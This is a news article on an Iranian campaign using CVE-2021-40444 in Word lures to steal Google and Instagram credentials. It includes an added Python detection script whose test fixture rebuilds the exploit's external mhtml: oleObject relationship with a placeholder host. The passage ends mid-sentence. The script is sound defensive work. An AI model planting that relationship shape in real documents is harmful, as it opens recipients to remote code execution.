Iranian hackers exploit a MSHTML bug to steal Google, Instagram creds


Researchers from SafeBreach Labs have analyzed a new Iranian threat actor targeting Farsi-speaking victims. The campaign was first publicly flagged in mid-September 2021 by the Shadow Chaser Group.

A newly discovered Iranian threat actor is stealing Google and Instagram credentials using an exploit for a Microsoft MSHTML remote code execution flaw.

According to SafeBreach Labs, the attacks, publicly reported on Twitter in September by the Shadow Chaser Group, began in July as spear-phishing emails.

The campaign targets Windows users with malicious Microsoft Word attachments that exploit an MSHTML remote code execution (RCE) bug tracked as CVE-2021-40444.
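The article does not describe the internals of the lure documents, but CVE-2021-40444 exploit documents analyzed publicly share a recognizable trait: a `.docx` whose relationship part declares an `oleObject` relationship with `TargetMode="External"` and a `Target` using the `mhtml:` scheme (pointing at an attacker-controlled page). The following triage script is an added example written for this page, not code from the article, SafeBreach Labs or Shadow Chaser Group. It scans a `.docx` (a ZIP of XML parts) for that pattern. The two sample documents it builds are constructed in memory; the `example.invalid` host is a placeholder, not an indicator from this campaign.

```python
"""Heuristic triage of .docx files for the external OLE object relationship
pattern associated with CVE-2021-40444 (MSHTML RCE).
Added example for this article, not code from SafeBreach Labs or the article itself.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Schemes seen in public CVE-2021-40444 samples: mhtml: wrapping an http(s)
# URL, optionally followed by an x-usc: component. Plain http(s) external
# OLE targets are also worth a look, so they are flagged too.
SUSPICIOUS_SCHEME = re.compile(r"^(mhtml:|x-usc:|https?:)", re.IGNORECASE)


def find_external_ole_targets(docx_bytes: bytes) -> list:
    """Return the Target of every oleObject relationship that is marked
    External, across all .rels parts in the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append(rel.get("Target", ""))
    return hits


def is_suspicious(docx_bytes: bytes) -> bool:
    """True if any external oleObject target uses a remote-fetch scheme."""
    return any(SUSPICIOUS_SCHEME.match(t) for t in find_external_ole_targets(docx_bytes))


def build_docx(rels_xml: str) -> bytes:
    """Construct a minimal docx-like ZIP containing only the parts the scanner
    reads. Test fixture, not a real Word document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: an ordinary document with an embedded (internal) image.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="media/image1.png"/>
</Relationships>"""

# Constructed sample mimicking the CVE-2021-40444 relationship shape.
# example.invalid is a placeholder host, not a real indicator.
SUSPICIOUS_TARGET = ("mhtml:http://example.invalid/side.html"
                     "!x-usc:http://example.invalid/side.html")
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId5" Type="{OLE_REL_TYPE}"
    Target="{SUSPICIOUS_TARGET}" TargetMode="External"/>
</Relationships>"""

BENIGN_DOC = build_docx(BENIGN_RELS)
SUSPICIOUS_DOC = build_docx(SUSPICIOUS_RELS)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("lure", SUSPICIOUS_DOC)):
        print(label, is_suspicious(doc), find_external_ole_targets(doc))
```

To use it on a real mailbox quarantine, read each attachment's bytes and call `is_suspicious`; a hit is a strong signal for this CVE but not proof, so hand the document to a sandbox rather than treating the heuristic alone as a verdict. It also does nothing for documents delivered as RTF or as `.doc` OLE2 files, which do not carry OPC relationship parts.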

“Almost half of the victims are located in the United States. Based on the Microsoft Word document content – which blames Iran’s leader for the ‘Corona massacre’ and the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime,” said Tomer Bar, Director of Security Research at SafeBreach Labs.

“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage
